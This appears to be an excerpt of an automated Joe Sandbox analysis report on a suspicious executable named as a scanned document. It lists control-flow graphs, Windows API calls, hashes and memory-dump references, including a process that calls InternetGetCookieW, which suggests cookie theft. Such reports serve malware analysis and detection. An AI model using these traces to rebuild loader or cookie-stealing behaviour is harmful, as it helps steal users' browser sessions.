                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                  • Opcode ID: 399fc854321fb60894e560b418d9eb33626db811133a7594be2c8a4a5e427763
                                                                                                                                                                                                                  • Instruction ID: ada6f6979ccd3aa87764e6eda288d88b04568007b2e0cbffbe353eb09a271e90
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 399fc854321fb60894e560b418d9eb33626db811133a7594be2c8a4a5e427763
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F04470A00288BBDB199F91DC4DBAFBFF4FF14752F004064F945A6160DB315E44DA94

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 400 5e634d-5e6372 call 5e3f72 403 5e637f-5e63a5 MultiByteToWideChar 400->403 404 5e6374-5e637c 400->404 405 5e63ab-5e63b7 403->405 406 5e6444-5e6448 403->406 404->403 407 5e63b9-5e63ca 405->407 408 5e6403 405->408 409 5e644a-5e644d 406->409 410 5e6454-5e6469 call 5e123a 406->410 412 5e63cc-5e63db call 5eac20 407->412 413 5e63e5-5e63eb 407->413 411 5e6405-5e6407 408->411 409->410 415 5e643d-5e6443 call 5e646a 411->415 416 5e6409-5e642b call 5e20b0 MultiByteToWideChar 411->416 412->415 426 5e63dd-5e63e3 412->426 418 5e63ec call 5e62ff 413->418 415->406 416->415 428 5e642d-5e643b GetStringTypeW 416->428 423 5e63f1-5e63f6 418->423 423->415 427 5e63f8 423->427 429 5e63fe-5e6401 426->429 427->429 428->415 429->411
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,005E54C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 005E639A
                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 005E63D2
                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005E6423
                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005E6435
                                                                                                                                                                                                                  • __freea.LIBCMT ref: 005E643E
                                                                                                                                                                                                                    • Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1857427562-0
                                                                                                                                                                                                                  • Opcode ID: a62ed9f5616cd8af5362555f59f1c75e5a6e41261c6f8dc516ee685a440a62ed
                                                                                                                                                                                                                  • Instruction ID: 9dd86779e610c496890f985a62c672249bdf0777d223b47685c425571d0ef7f3
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a62ed9f5616cd8af5362555f59f1c75e5a6e41261c6f8dc516ee685a440a62ed
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB31DF32A0029AABDF289F66DC89DAE7FA5FB60390F044128FC54D7190E735DD54CBA0

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 430 5e561e-5e5633 GetEnvironmentStringsW 431 5e568b 430->431 432 5e5635-5e5655 call 5e55e7 WideCharToMultiByte 430->432 433 5e568d-5e568f 431->433 432->431 438 5e5657 432->438 436 5e5698-5e56a0 433->436 437 5e5691-5e5692 FreeEnvironmentStringsW 433->437 437->436 439 5e5658 call 5e62ff 438->439 440 5e565d-5e5662 439->440 441 5e5664-5e5678 WideCharToMultiByte 440->441 442 5e5680 440->442 441->442 443 5e567a-5e567e 441->443 444 5e5682-5e5689 call 5e4869 442->444 443->444 444->433
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 005E5627
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005E564A
                                                                                                                                                                                                                    • Part of subcall function 005E62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,005E7E5B,?,00000000,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD), ref: 005E6331
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005E5670
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E5683
                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005E5692
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2278895681-0
                                                                                                                                                                                                                  • Opcode ID: b4a18741e2a75db547d761098f98635c4677d468ea74acd5050e46162899ccdf
                                                                                                                                                                                                                  • Instruction ID: 717e5393e4a71e552df72428d9c5744f95eed3c65f3cb277db689bf39129d431
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4a18741e2a75db547d761098f98635c4677d468ea74acd5050e46162899ccdf
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601F272602AD67F27291ABB5C8CC7B6E6DFEC2BA93560169F984C7100FF608D0195B0

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 447 5e44a8-5e44bf GetLastError 448 5e44cd-5e44d2 447->448 449 5e44c1-5e44cb call 5e5904 447->449 451 5e44d4 call 5e480c 448->451 449->448 454 5e451e-5e4525 SetLastError 449->454 453 5e44d9-5e44df 451->453 455 5e44ea-5e44f8 call 5e595a 453->455 456 5e44e1 453->456 458 5e4527-5e452c 454->458 463 5e44fd-5e4513 call 5e4296 call 5e4869 455->463 464 5e44fa-5e44fb 455->464 459 5e44e2-5e44e8 call 5e4869 456->459 465 5e4515-5e451c SetLastError 459->465 463->454 463->465 464->459 465->458
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,005E47FE,005E7E79,?,005E686F,?,00000004,00000000,?,?,?,005E3BCD,?,00000000), ref: 005E44AD
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E44E2
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E4509
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 005E4516
                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 005E451F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                  • Opcode ID: 9206133b47459e4d8725844b1d29b34388cf175f7e9c878bd6f958d4ee947d7a
                                                                                                                                                                                                                  • Instruction ID: d7f2db758cd56d138c102aa7b5feb6693054c0dedf5514ed17196017b0278093
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9206133b47459e4d8725844b1d29b34388cf175f7e9c878bd6f958d4ee947d7a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1012636200AC2A7961E7A332C8DE3B1E2EBBD0372B200025F5D9D62C2FF208D049824

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 470 5e6176-5e6181 471 5e61dc-5e61de 470->471 472 5e6183-5e618b 470->472 473 5e618d-5e6193 call 5e4869 472->473 474 5e6194-5e619d 472->474 473->474 476 5e619f-5e61a5 call 5e4869 474->476 477 5e61a6-5e61af 474->477 476->477 480 5e61b8-5e61c1 477->480 481 5e61b1-5e61b7 call 5e4869 477->481 484 5e61ca-5e61d3 480->484 485 5e61c3-5e61c9 call 5e4869 480->485 481->480 484->471 486 5e61d5-5e61db call 5e4869 484->486 485->484 486->471
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E618E
                                                                                                                                                                                                                    • Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
                                                                                                                                                                                                                    • Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E61A0
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E61B2
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E61C4
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E61D6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                  • Opcode ID: 92e29a2f430fa8e31e37c868d612303685329ff06a7377538fa66b35eb27c366
                                                                                                                                                                                                                  • Instruction ID: e4fcd410f4aef2becb7f2635201b96f7aa6396801087c800dff88568db32f1fc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92e29a2f430fa8e31e37c868d612303685329ff06a7377538fa66b35eb27c366
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0AF32608680AFC66DEB17F885C2A3FDDBAA0BD07580804F08AC7842C724FC80CA54
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3DAD
                                                                                                                                                                                                                    • Part of subcall function 005E4869: HeapFree.KERNEL32(00000000,00000000,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?), ref: 005E487F
                                                                                                                                                                                                                    • Part of subcall function 005E4869: GetLastError.KERNEL32(?,?,005E620D,?,00000000,?,00000000,?,005E6234,?,00000007,?,?,005E669F,?,?), ref: 005E4891
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3DBF
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3DD2
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3DE3
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3DF4
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                  • Opcode ID: 43c1b76c1936bac34c5c92f7f5c1ea179b045c1db88a44d6759616180d8275cd
                                                                                                                                                                                                                  • Instruction ID: 2fe1a68f837d669bf7db356bbf6ce141e04e09afe9fd860152cb8c37f240b54c
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43c1b76c1936bac34c5c92f7f5c1ea179b045c1db88a44d6759616180d8275cd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19F03AB8804AA1CFC749AF17FD058293F71BBA57607400256F542DA2B1C7390959EFCA
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe,00000104), ref: 005E2F93
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E305E
                                                                                                                                                                                                                  • _free.LIBCMT ref: 005E3068
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe
                                                                                                                                                                                                                  • API String ID: 2506810119-3454431308
                                                                                                                                                                                                                  • Opcode ID: a5632897cca838852657c014edff544f6fa542f839c90bb8f623417bf8143176
                                                                                                                                                                                                                  • Instruction ID: 3fdc4f359b1f8cda0ba824dabe55c852d489ec31a9d96d0c87c6bb5a6e7f863a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5632897cca838852657c014edff544f6fa542f839c90bb8f623417bf8143176
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D31AC71A00298EFCB29DB9BDC899AEBFFCFB85710F104066E484DB210D6718E45DB91
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005E2594,00000000,?,005F1B50,?,?,?,005E2737,00000004,InitializeCriticalSectionEx,005EBC48,InitializeCriticalSectionEx), ref: 005E25F0
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005E2594,00000000,?,005F1B50,?,?,?,005E2737,00000004,InitializeCriticalSectionEx,005EBC48,InitializeCriticalSectionEx,00000000,?,005E24C7), ref: 005E25FA
                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005E2622
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                  • Opcode ID: 7c53cb9331dc81585b27b2371b2bf387e72033582941ee6fc960c04b08fd554d
                                                                                                                                                                                                                  • Instruction ID: 9fd92891d46c8add5c1568e0f4d7e432ac1afadf4b15dd5ef45906899b558dc4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c53cb9331dc81585b27b2371b2bf387e72033582941ee6fc960c04b08fd554d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27E01272640284BBEF152B62EC4EB5B3F58BB10B52F104420F99DA80A5EBA1A9549944
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue), ref: 005E580F
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue,005EC4D8,FlsSetValue,00000000,00000364,?,005E44F6), ref: 005E581B
                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,005E5784,00000000,00000000,00000000,00000000,?,005E5981,00000006,FlsSetValue,005EC4D8,FlsSetValue,00000000), ref: 005E5829
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                  • Opcode ID: 89237d89d633e48c3701e8c3804edeffbcbe9ff055a8c67cc812efdfb87405f7
                                                                                                                                                                                                                  • Instruction ID: f39e584f8f0bcb3f3f6f32c9f1cfc7d21ebf7bf8e2a81f601ed896306ccf52c7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89237d89d633e48c3701e8c3804edeffbcbe9ff055a8c67cc812efdfb87405f7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F01AC3260A6B2EBD7294A6AAC88A577F58BF157A5B300524FAE6D7140E720D805C6E0
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetOEMCP.KERNEL32(00000000,?,?,005E5147,?), ref: 005E4EE9
                                                                                                                                                                                                                  • GetACP.KERNEL32(00000000,?,?,005E5147,?), ref: 005E4F00
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.1950029951.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1949987588.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950060796.00000000005EB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950084572.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.1950108445.00000000005F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_5e0000_Scan_doc_09_16_24_1203.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: GQ^
                                                                                                                                                                                                                  • API String ID: 0-2783400625
                                                                                                                                                                                                                  • Opcode ID: 7efab400008320f45c5172a5a8b49b7948fecbc7bfd81930d2f87e2cffaf52dc
                                                                                                                                                                                                                  • Instruction ID: 26f5e4821e09a53ff0763319a6070715755cc5e32bc508b3a119dc828ad634e9
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efab400008320f45c5172a5a8b49b7948fecbc7bfd81930d2f87e2cffaf52dc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61F08C30800684DBDB288B69DC487B97BB4BB50729F100344E4B4CE6E1C7766848DF51

                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                  Execution Coverage:16.3%
                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                                  execution_graph 23045 7ffd9b8a1608 23047 7ffd9b8a1611 23045->23047 23046 7ffd9b8a1683 23047->23046 23048 7ffd9b8a1802 LoadLibraryExW 23047->23048 23049 7ffd9b8a1836 23048->23049 23050 7ffd9b8a994b 23051 7ffd9b8a9957 CreateFileW 23050->23051 23053 7ffd9b8a9a8c 23051->23053 23041 7ffd9b8aece2 23044 7ffd9b8aed0f 23041->23044 23042 7ffd9b8aee7b InternetGetCookieW 23043 7ffd9b8aeed9 23042->23043 23044->23042 23044->23044

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                  • Opcode ID: 0b73b83df6d107e1207b55d86031f35a637a32055594344e0aef78b289b03b3b
                                                                                                                                                                                                                  • Instruction ID: 5d5de36463bf5c9c76d403fcc4a59ec183896450e285a7448cee168e1a7e94db
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b73b83df6d107e1207b55d86031f35a637a32055594344e0aef78b289b03b3b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2811B31B0EA8D4FD755EBBC88696B87BD1EF5A210B0841BFD059C71E2DE24A406C351

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1066 7ffd9b8aece2-7ffd9b8aeda8 1070 7ffd9b8aedb5-7ffd9b8aedba 1066->1070 1071 7ffd9b8aedaa-7ffd9b8aedb2 1066->1071 1072 7ffd9b8aedc7-7ffd9b8aedd3 1070->1072 1073 7ffd9b8aedbc-7ffd9b8aedc4 1070->1073 1071->1070 1074 7ffd9b8aee59-7ffd9b8aee60 1072->1074 1075 7ffd9b8aedd9-7ffd9b8aee0c 1072->1075 1073->1072 1076 7ffd9b8aee7b-7ffd9b8aeed7 InternetGetCookieW 1074->1076 1082 7ffd9b8aee0e-7ffd9b8aee10 1075->1082 1083 7ffd9b8aee62-7ffd9b8aee68 1075->1083 1077 7ffd9b8aeed9 1076->1077 1078 7ffd9b8aeedf-7ffd9b8aeef2 1076->1078 1077->1078 1080 7ffd9b8aef17-7ffd9b8aef49 call 7ffd9b8aef65 1078->1080 1081 7ffd9b8aeef4-7ffd9b8aef16 1078->1081 1094 7ffd9b8aef4b 1080->1094 1095 7ffd9b8aef50-7ffd9b8aef64 1080->1095 1081->1080 1084 7ffd9b8aee49-7ffd9b8aee57 1082->1084 1085 7ffd9b8aee12-7ffd9b8aee24 1082->1085 1090 7ffd9b8aee6a-7ffd9b8aee76 1083->1090 1084->1090 1088 7ffd9b8aee28-7ffd9b8aee3b 1085->1088 1089 7ffd9b8aee26 1085->1089 1088->1088 1093 7ffd9b8aee3d-7ffd9b8aee45 1088->1093 1089->1088 1090->1076 1093->1084 1094->1095
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000001.00000002.2642164148.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8a0000_dfsvc.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CookieInternet
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 930238652-0
                                                                                                                                                                                                                  • Opcode ID: 57da45ce04d9aac7ce58cc64e2f27867836c9f5042346ea0172a1e58f8a4da37
                                                                                                                                                                                                                  • Instruction ID: 8e64d95b091f8ec7ad4a4fa61c639f61e1f40738912b89a7e24efd99c3408277
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57da45ce04d9aac7ce58cc64e2f27867836c9f5042346ea0172a1e58f8a4da37
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92911130608B8D4FDB69DF68C8657E53BE1FF59311F04426FD84DC76A2CA74A9058B81

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
